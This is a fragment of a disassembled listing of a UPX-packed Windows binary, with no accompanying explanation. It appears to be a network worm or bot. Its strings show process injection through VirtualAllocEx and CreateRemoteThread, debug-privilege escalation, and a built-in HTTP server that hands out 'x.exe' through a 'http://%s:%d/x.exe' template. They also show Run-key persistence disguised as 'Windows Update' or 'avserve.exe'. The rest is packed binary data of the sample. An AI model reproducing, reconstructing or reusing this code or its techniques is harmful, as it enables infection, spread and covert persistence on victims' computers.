dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31604B00 dd 0 ; DATA XREF: sub_316017DB+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31604BBE dd 1004600h ; DATA XREF: sub_316017DB+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31604BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_316017DB+41B�o
; sub_316017DB+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31604C70: ; DATA XREF: sub_316017DB+44A�o
jmp short loc_31604C78
; ---------------------------------------------------------------------------
jmp short loc_31604C7A
; ---------------------------------------------------------------------------
align 8
loc_31604C78: ; CODE XREF: UPX0:loc_31604C70�j
; DATA XREF: sub_316017DB+5C�o
pop esp
pop esp
loc_31604C7A: ; CODE XREF: UPX0:31604C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31604C84 dd 1CEC8166h ; DATA XREF: sub_316017DB+D�r
dword_31604C88 dd 0E4FF07h ; DATA XREF: sub_316017DB+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31601D42+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31601D42+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31601D42+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31601D42+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31601D42+8�o
; sub_3160238C+11E�o
align 10h
aUterm18 db 'uterm18',0 ; DATA XREF: sub_31601DCA:loc_31601EAF�o
; UPX0:3160232B�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31601DCA+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31601DCA:loc_31601E11�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31601DCA+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31601DCA+18�o
align 4
dword_31604D38 dd 0E9F3F5h ; DATA XREF: sub_31602058+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31602058+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31602058+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31602058+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_31602058+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31602316�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_3160238C+125�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3160238C+117�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_3160238C+110�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3160238C+103�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_3160238C+AF�o
align 4
aU18 db 'u18',0 ; DATA XREF: sub_3160238C+A8�o
aU17 db 'u17',0 ; DATA XREF: sub_3160238C+A1�o
aU16 db 'u16',0 ; DATA XREF: sub_3160238C+9A�o
aU15 db 'u15',0 ; DATA XREF: sub_3160238C+93�o
aU14 db 'u14',0 ; DATA XREF: sub_3160238C+8C�o
aU13i db 'u13i',0 ; DATA XREF: sub_3160238C+85�o
align 10h
aU13 db 'u13',0 ; DATA XREF: sub_3160238C+7E�o
aU12 db 'u12',0 ; DATA XREF: sub_3160238C+77�o
aU11 db 'u11',0 ; DATA XREF: sub_3160238C+70�o
aU10 db 'u10',0 ; DATA XREF: sub_3160238C+69�o
aU9 db 'u9',0 ; DATA XREF: sub_3160238C+62�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_3160238C+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_3160238C+54�o
align 10h
aU16x db 'u16x',0 ; DATA XREF: sub_3160238C+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3160238C+46�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_3160238C+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3160238C+38�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_3160238C+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3160238C+2A�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_3160238C+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_316026DE+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3160219E+23�o
; sub_316029B2+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_3160219E+1C�o
; sub_31602A60+87�o ...
align 4
aPiatvxkotmgvos db 'piatvxkotmgvosdrr',0 ; DATA XREF: sub_316015C7+4F�o
; sub_31602B2C+57�o ...
align 10h
dd 0
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31602B2C+32�o
aClient db 'Client',0 ; DATA XREF: sub_31602B2C+BC�o
; sub_31602B2C+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31602B2C+37�o
; sub_31602B2C+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_316029B2+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_316029B2+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_316029B2+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_316029B2+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_316029B2+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_316029B2+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_316029B2+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_316029B2+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_316029B2+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_316029B2+F�o
align 4
a1: ; DATA XREF: sub_31602B2C+B7�o
unicode 0, <1>,0
dd 8 dup(0)
dword_31604FC8 dd 0 ; DATA XREF: sub_31602058+C7�r
; sub_3160219E+80�w
dword_31604FCC dd 0 ; DATA XREF: sub_316015C7+43�r
; sub_3160169C+64�o ...
dword_31604FD0 dd 0 ; DATA XREF: sub_31602058+79�r
; sub_31602058:loc_31602106�r ...
dword_31604FD4 dd 44h ; DATA XREF: sub_31601DCA+C2�r
; UPX0:31602336�w ...
dword_31604FD8 dd 0 ; DATA XREF: sub_31602378+2�r
; sub_3160238C+C0�w
dword_31604FDC dd 0 ; DATA XREF: sub_3160219E+E0�w
; sub_316026DE+20�r
dword_31604FE0 dd 31600000h ; DATA XREF: sub_31601DCA+6�r
; UPX0:3160231B�w
dword_31604FE4 dd 0 ; DATA XREF: sub_316015C7+49�r
; sub_3160169C+5B�o ...
dword_31604FE8 dd 0 ; DATA XREF: UPX0:3160277B�w
; UPX0:3160278D�w
word_31604FEC dw 0 ; DATA XREF: sub_3160252B+3B�r
; sub_3160258F:loc_316025F0�r ...
align 10h
dword_31604FF0 dd 0 ; DATA XREF: sub_31602B2C+25�w
; sub_31602B2C+110�w
align 10h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31605000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 201h
dd 40D5FDh, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 10h, 0E000000h, 23h
dd 10h, 40h, 316000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 50h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 0F4000000h, 8C00002Ch, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 16000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 0F4000000h, 0Fh, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 0FC000040h, 0C300002Eh, 4D000044h
dd 0A0024A19h, 86954868h, 2162017h, 0BB217D03h, 0A73DB9AEh
dd 769F6801h, 0E44A20E6h, 3AB73666h, 1B5AB7CCh, 77684E0h
dd 6A3DB9A4h, 96F42A70h, 39C8608Ch, 5E364719h, 7A97640Ah
dd 2ECD0084h, 0A228F0D9h, 3C4B003Fh, 59B2A76Ch, 98C8B2CBh
dd 0EC0167E2h, 0DC23BDE8h, 57E500Fh, 90C6150Dh, 0DBA0B0Fh
dd 0C9D328C0h, 0C4E33B73h, 4E54908h, 88DB0C7Ah, 0F8492114h
dd 0BF762DC5h, 1CD66C84h, 0DE402EDBh, 1B4C7012h, 4440E7B0h
dd 4440BCF8h, 9C64358h, 101BDE50h, 0BD64EF1Eh, 0D94B7CDh
dd 0F9812197h, 0AD9FA7ACh, 80E87CFBh, 1624A5h, 52682506h
dd 1C969D1Ch, 761CC96Ch, 0D96F412h, 3F2677A7h, 6A6E0AEFh
dd 0C7BC87Ch, 92C78F0Fh, 7BC9BE49h, 64776454h, 2490E192h
dd 498C9FE9h, 0BB73330Dh, 0EDCF7824h, 0B0F88248h, 0C9014B0h
dd 266F415h, 8CCC66A1h, 7408707Ah, 3E264E5Eh, 5FF4743Ah
dd 761C2BA6h, 8602CFBEh, 0A87F24E4h, 0F805A435h, 0D741E06Ch
dd 37571282h, 0C45A7457h, 142B2FE4h, 4B74F80Eh, 4C25A068h
dd 0A8A4A2DDh, 0A3073D74h, 0A59FB616h, 0FFA04120h, 0E80FFC55h
dd 0D6EAE4B9h, 0AC507B5Ch, 0F00E9628h, 356CC002h, 0F85521FDh
dd 0E48C0009h, 0EC4EC1F0h, 2EF47558h, 0D8B1887h, 1C5BFFE0h
dd 983D072h, 573C418Bh, 2C68C103h, 0FB64BE4Dh, 34488B77h
dd 8950788Bh, 0B4A0F44Dh, 9A1C68D8h, 1BE062A5h, 1F0CFD8h
dd 0A5D97C3Bh, 120868ACh, 0DED74ECh, 18DB26D7h, 8211101Ch
dd 5914090Eh, 0FDA746F8h, 51F84DCBh, 0C5181850h, 971762C6h
dd 0B0632A68h, 0E96345Dh, 3CA1A4Ah, 0D6ED346Bh, 30EB6C0Eh
dd 5559AB19h, 0ADD47DF0h, 0CCDD5389h, 51F03E45h, 0BA967C4Fh
dd 0F853500Bh, 8CD435ACh, 9E0F13D6h, 6A17FA70h, 0D5B177D0h
dd 0EC55FEA6h, 574C73Bh, 991BEB32h, 61736E4Ch, 5986688Bh
dd 0EB05FC0Eh, 35480807h, 0EF747343h, 46390949h, 517A1B86h
dd 0F600951h, 83366931h, 0D8512C8h, 0ACDDB825h, 0AF6D0AEBh
dd 0ECB213B1h, 672D590Fh, 0C244CEBAh, 0BCB66AF9h, 12C49D3Ch
dd 500C80B7h, 507D50A8h, 0D35852E9h, 195DC02Ch, 2DE27C20h
dd 0B5431166h, 1914247Ch, 0B3D46E2Ch, 96177EEBh, 0FFAB261Ah
dd 61C280FFh, 461E1488h, 0E97CF73Bh, 3B2480h, 0DE335466h
dd 4465AEB6h, 0AC5A5F2Eh, 0E9DB5657h, 66A980C0h, 0DC732FA9h
dd 776C44B7h, 501950F0h, 0ACAA0056h, 0A01E1C77h, 27C49509h
dd 746449F4h, 0FA687B5Bh, 0C7FFF00Ch, 4CB64F08h, 0CC3434DBh
dd 754C2E2Ah, 0CD6B9D0Ah, 0BC500A6Ch, 54181A20h, 9F0B00Bh
dd 7FB807C6h, 404E013Bh, 0ED6F8E76h, 1008B0Ch, 448D5108h
dd 30215F24h, 0DB09A711h, 5903D32Ch, 43A10724h, 0CC15C277h
dd 0C82007BBh, 0DB32332Fh, 0C8E49E3Fh, 10E7C1F8h, 86A30B85h
dd 9033CDh, 125D8B02h, 3807CD33h, 9CDB8072h, 480CF69Eh
dd 0BDC65356h, 1C454011h, 2AABD9ADh, 0EC83C325h, 220135B4h
dd 17B5ADE7h, 0F2033366h, 359541F0h, 198DD868h, 683D9877h
dd 0D044B76Ch, 366474Fh, 54FECD8Bh, 9D14A54Dh, 0DAE1662Eh
dd 0F7007C54h, 34D7E06Fh, 0B933A1h, 3BC72B79h, 8B0272C1h
dd 7B94E1C1h, 292B5DBBh, 318C8A1h, 19AC23C7h, 0A6B7F12Dh
dd 1172233Dh, 4FF8786Ah, 0E146D18Bh, 0E113C4EBh, 37114650h
dd 0D467B279h, 6815941Eh, 166D0B3Ch, 6803726Bh, 3A3C9738h
dd 0ACEB31F4h, 52535453h, 48CD083h, 9824623Fh, 30FD04C2h
dd 0D1F6C121h, 0B1D1F457h, 5D0DE2D0h, 9C68F53Bh, 6F7C84Eh
dd 89806868h, 89DEEDB6h, 1827841Dh, 0C014EC4Ah, 3DADB3D4h
dd 6B00F275h, 1027B53h, 0D26B543Ah, 7780C504h, 0A39ACD28h
dd 741A4D0Ch, 0E1D59D2Fh, 0A3DCCDD9h, 6BA33F0Ch, 0FEE9784Ch
dd 5153FCA4h, 333A8656h, 0D8674B62h, 0F9265668h, 70FBE369h
dd 0C258195Eh, 0C05E0510h, 0A8499A5Eh, 0E80C4B56h, 0DDEC5D89h
dd 0D93BFB7h, 0FF25FF05h, 0C33A041Fh, 7443DCA3h, 837FA126h
dd 0CC8A1FE7h, 0DF74C984h, 16EA6B50h, 42F57C66h, 65A54039h
dd 90AFA664h, 7B440CE9h, 0C714F85Fh, 0D8BE8FEAh, 689E481Fh
dd 0F092058h, 670A1228h, 53E2EB2Fh, 43455FCFh, 0E60B30EBh
dd 0AE700190h, 0DA1E333Ch, 0D6B0DD66h, 0E6023E11h, 3CD86DD6h
dd 0B4803A98h, 0A3ABB068h, 0C11580E0h, 7C74E08Ch, 66C3047Bh
dd 1AD4A3ECh, 52B73DE4h, 0F766C045h, 0D29E0ECh, 0AE19043Eh
dd 4C34281Bh, 23BAB670h, 0EBEDC613h, 4FB5FB1Ah, 99881386h
dd 44D83569h, 60939070h, 694039B0h, 2C134490h, 665CD225h
dd 9B91C845h, 6EF61A1h, 40A0489Ch, 0E472391Ch, 30A838A4h
dd 20B028ACh, 8E472391h, 14B818B4h, 723910BCh, 0CC0C8E4h
dd 4C808C4h, 8E4700CCh, 0F8D01E7Ch, 0D8F4D44Dh, 2DECDCF0h
dd 0E02391CCh, 79E4E4E8h, 70045B35h, 6CC52904h, 6DCBC6A3h
dd 0FCA2D0EBh, 8839402h, 0B7261273h, 94D2E01Bh, 8E988533h
dd 0CFF5924h, 0C26CE8EBh, 0C1A6721h, 0E61A4EB8h, 39685F83h
dd 68397479h, 0A89D4DD4h, 4DB19313h, 64DCC29h, 242E5FC4h
dd 0BC0DBA4Ch, 5C930A8Ch, 0DE12FC8Eh, 219E6857h, 169C0E0Fh
dd 45C1E33Ah, 80342790h, 0D21E5174h, 0B414AE87h, 1388EA18h
dd 24E3EB8Eh, 65093C28h, 61A12615h, 247031B6h, 0A4805547h
dd 1F0AAD7Fh, 8A519F01h, 5C900B45h, 0EC380C1Eh, 52DB32FFh
dd 3831A43Ah, 108FEE5Dh, 8825DCDFh, 79E0B5Dh, 35B70FD7h
dd 0C067A4ECh, 99A6019Fh, 0D603FEF7h, 0D976FE8Fh, 80C3FE32h
dd 0BD72FFFBh, 7662AC5Eh, 0C09D935Fh, 3361F6A4h, 0B61D5868h
dd 84F21C2h, 631B0A81h, 5DCDACD8h, 75810B09h, 4DA49672h
dd 0C50F75B0h, 891E252Bh, 0CED6F20Fh, 0FF84323Dh, 8143D703h
dd 86DF38FBh, 9F88155Ah, 0D35D875Fh, 419D8B35h, 0A24C737Bh
dd 2B9E04B6h, 73F22FD8h, 0DF3C5BCDh, 0FEFF04FDh, 887F3CE8h
dd 362DB0F7h, 8BCF6B7Eh, 0DCE53B08h, 59D93BAAh, 0A0A33EECh
dd 572F9E57h, 12CF6C9Ch, 59F8C801h, 0B7128F13h, 0ADFF8712h
dd 0E4EE75B3h, 0F0D64761h, 0A6271068h, 9ED3BED3h, 0E0E0C04Bh
dd 0A91F7084h, 2956B142h, 0B4374E08h, 30197A8Fh, 9C5C5C5Dh
dd 7CCF6DE4h, 0DC2C3EF0h, 0CBB0030Bh, 456C180Dh, 11102D4Eh
dd 0AB01DF19h, 6C42BA77h, 0B80C6FBh, 2EC2C0DFh, 55612B5Ch
dd 63579356h, 76B3BC06h, 5105E6E4h, 0C34330E2h, 0FD1F0CA5h
dd 483776F4h, 5314546Ch, 20BF653h, 0ED38506Ah, 0E8CD02DFh
dd 0D2051E5Dh, 18740096h, 1C6B9809h, 10F3117Ah, 0EC281905h
dd 14384Eh, 1606D84Fh, 0EDAAADAh, 74AF9F84h, 0C7D5530Dh
dd 0F0D1051h, 39031108h, 3A18244Ch, 36C3B6EDh, 7EED85F4h
dd 26179711h, 0EF144D2Ch, 0C3BB60C9h, 0EBA20596h, 0B4750DF2h
dd 652DC583h, 68ECDDEBh, 646333Fh, 880D5C0Bh, 0B3BE150Ch
dd 6E9B0B11h, 1C140810h, 21843A5Dh, 5618D951h, 96C6C2EEh
dd 0F6182985h, 703D563Eh, 74E3188Eh, 610D2ADCh, 2DBA5964h
dd 102050C5h, 17E20818h, 9C03E05Bh, 8B550F5Eh, 6BAD6C6h
dd 2EFFD3CDh, 0C4532C56h, 56764C80h, 0C8270055h, 1722D672h
dd 40C520Ah, 1C931679h, 28A15D0Ch, 1C4F1501h, 13DE5306h
dd 9FB78B4Eh, 948E35B8h, 5C1E3C26h, 0F7794E36h, 0F10EB7F6h
dd 1FE8CBC1h, 7687AA4h, 3578B64Bh, 0D0E6D84Ch, 10B3408Bh
dd 0E0D92007h, 1C9B27BBh
dd 8D477DE2h, 6D011E74h, 1307FBFCh, 101456E8h, 0E0B5FF1Ch
dd 0BC82E645h, 0FFF37D4h, 0D08521Fh, 60CCCD87h, 76DC4650h
dd 0CE81C2BDh, 38B7895Ch, 8D8E0F75h, 57D0E06Ch, 744F88AFh
dd 0C85CD806h, 0DC472391h, 0E448E050h, 723CF93Ch, 0EC24E8E4h
dd 4EFCF018h, 9A2FECF4h, 7DB08326h, 744FBF0Ah, 0BE9C4C2Ch
dd 188B69E4h, 2C8A3459h, 5D9FC828h, 7B06C17Dh, 150E1775h
dd 89F60B1Dh, 37354C9Ah, 75B68E83h, 8C1361A5h, 55788114h
dd 0B3AD0974h, 74188FE8h, 636A8844h, 67027FA3h, 0A184A717h
dd 3E0831Bh, 5E95C083h, 420582F4h, 72105292h, 0C8C2170Dh
dd 3BDCFD10h, 0CC3DDC8Bh, 300E26D6h, 14CC387Bh, 6150E138h
dd 59DE84D0h, 2C20408Dh, 96F99598h, 71A3C62Ah, 0B3660D9Fh
dd 541441C4h, 0A61E01F4h, 7A3424Bh, 562E84E0h, 0DC64812Ch
dd 8310DBC5h, 0C7481F7Dh, 0F0254414h, 2FEF8452h, 6AE09E80h
dd 0C4BF501Dh, 0C151E871h, 3F3081EAh, 0EC1C3774h, 0AD030AFh
dd 0D1B86CBBh, 0C5F45352h, 5503306h, 0ED3D53BCh, 389BF735h
dd 590FEBB1h, 2DB632CEh, 689D020Bh, 0E81AE2E0h, 266581C6h
dd 0D1A468BBh, 66E768E0h, 0B9BB46CBh, 0AF5C1A0Dh, 0D71AC166h
dd 354C125Eh, 49D8DE12h, 0BBC631E7h, 0C823FD3Bh, 0AE2C1996h
dd 16C507F0h, 0C4816F2h, 0A66015EBh, 0CDA3101Ch, 0F03C0409h
dd 485743D5h, 3B44330Ch, 8B678B68h, 136A767Dh, 0ECFF4011h
dd 53373C8Ch, 10F8051Ch, 48D4F0F4h, 0CCD60Dh, 8F8D8151h
dd 0FB2FBEFDh, 0E9811472h, 85042D0Bh, 0EC731701h, 0F56FB62Bh
dd 0C48BC8EDh, 8BE18B0Ch, 5004D008h, 6443CCC3h, 46C6C6C2h
dd 4958055Ch, 45800000h, 97F100A0h, 65451E6h, 53522402h
dd 0E296EFFFh, 0CA803141h, 8DF50101h, 52791183h, 3AE42AECh
dd 0FFFFE7F6h, 9B49FFFFh, 0AFBEE0EAh, 447EDB21h, 615E1A95h
dd 1F85A032h, 0FF949F6Ah, 0A6843994h, 0CE358F26h, 0FFFF5C1Dh
dd 0C9A5FF43h, 657AB20Bh, 4D373072h, 6C697A6Fh, 342F616Ch
dd 2820302Eh, 6B7F6F63h, 706DFFFFh, 62697461h, 203B656Ch
dd 4549534Dh, 9153620h, 646E6957h, 8177776Fh, 2073FFBAh
dd 3520544Eh, 3429312Eh, 0D400C9E4h, 0BE79E704h, 0B4C40167h
dd 8090A00Eh, 0BEFBE79Eh, 0E680474h, 3C480958h, 0EC9B2674h
dd 4530D479h, 6F102220h, 4AF9E7C8h, 40F80030h, 0B6B7B613h
dd 767663FDh, 7E75722Eh, 65070077h, 65976C64h, 0C6DFEF6Fh
dd 65C1660Fh, 72616573h, 1F0E6863h, 6F626F72h, 6FFE5737h
dd 61686378h, 1FD2676Eh, 720C7465h, 8DB02E64h, 6962FB7Ch
dd 2861007Ah, 616B6863h, 6D740C6Dh, 6BB1737h, 24782Dh
dd 0E6F6C06h, 6DB7DE62h, 476B37B6h, 7A027626h, 1B76742Eh
dd 0DFB185B0h, 706F7411h, 69176E2Eh, 1F27730Fh, 3310ADB0h
dd 610F788Dh, 0DB6C7564h, 74E1766Fh, 694B652Dh, 6F338072h
dd 5873A66Eh, 4E6EDBE1h, 67622E74h, 3267694Fh, 0FBF6B6Fh
dd 61777800h, 62626A2Ch, 99B00ADh, 7AF676DFh, 0A8616661h
dd 23655D2Eh, 0FEDDAF5Ch, 626110FFh, 66656463h, 6A696867h
dd 6E6D6C6Bh, 0FF7271C5h, 0F7BF8DFFh, 78777675h, 41547A79h
dd 45444342h, 49484746h, 4D4C4B4Ah, 1F504F4Eh, 5197FB46h
dd 57565554h, 1B5A5958h, 74746823h, 0FD81DCDFh, 2F2F3A70h
dd 2F0B7325h, 702E9765h, 0DBF37068h, 0E3F85B7h, 73260F3Dh
dd 64066E63h, 666E6926h, 0DBEDB948h, 313D3B76h, 74132638h
dd 0B5DFA01Bh, 58EB3B07h, 3732313Dh, 3A3101A8h, 7303038h
dd 2FDF646Ch, 0DFDF65h, 7F5DDFE8h, 33FFFEDBh, 0EEB966C9h
dd 5758D01h, 68AFE8Bh, 4607993Ch, 46302C06h, 7F889934h
dd 7FF41A1h, 0EBEDE247h, 0B9DAE80Ah, 2E6765DFh, 0FF999371h
dd 0C9BFF6FFh, 0BDFD1201h, 716FD91h, 0AA6872C1h, 0AA66FD42h
dd 14BA10FDh, 8F98A91Ch, 1A7FBADDh, 0F198F3C9h, 71028608h
dd 5F9010C0h, 9FD87CCBh, 599237FDh, 3A781C96h, 7157E414h
dd 713A0A7Dh, 6DF7DC45h, 0F19DF39Fh, 0F1098904h, 77119C04h
dd 40E91FECh, 0E3F367B3h, 0DC1C10F0h, 6059B20Bh, 6F7FB1ECh
dd 125C99Bh, 0A10414D9h, 9E71CA17h, 0B230BD2Bh, 61688D7Ch
dd 0E21AAD91h, 6C111D96h, 289F6B7Bh, 0C850B2h, 57DC1499h
dd 0FF122555h, 4EFF6EF6h, 1291C0A4h, 0F7ED9949h, 0C4140054h
dd 71CBCA3Ah, 0EEEC3D3Bh, 24FF1C67h, 0CF1A21E4h, 668FCDCDh
dd 64FFDD2Ch, 1E3F819Bh, 83B8B0FBh, 5D12CDC3h, 0ED93C9A8h
dd 1DCBB37Ch, 0B24AD25h, 0FB264FF6h, 96A6485Ah, 4C1B14C0h
dd 0F3EBA729h, 0BECFBA9Ch, 16E95D9Fh, 7126F434h, 0F90EFCF5h
dd 0BBB37F3Bh, 29EF13FFh, 5F376B46h, 0EC4766DEh, 116A1A8h
dd 7DFFC5B7h, 0EDFF7B08h, 0FDE9ECE9h, 2CE1FCB7h, 0FCF5CA01h
dd 0EDFFFFFCh, 0FCF25ADFh, 0F5FCF7EBh, 0C7D6ABAAh, 59AAF934h
dd 2A2A25B4h, 93ACC966h, 85B78190h, 902FFB3Fh, 0C983639Dh
dd 309271CDh, 513519BFh, 7FFD914h, 0A95F761h, 712A9172h
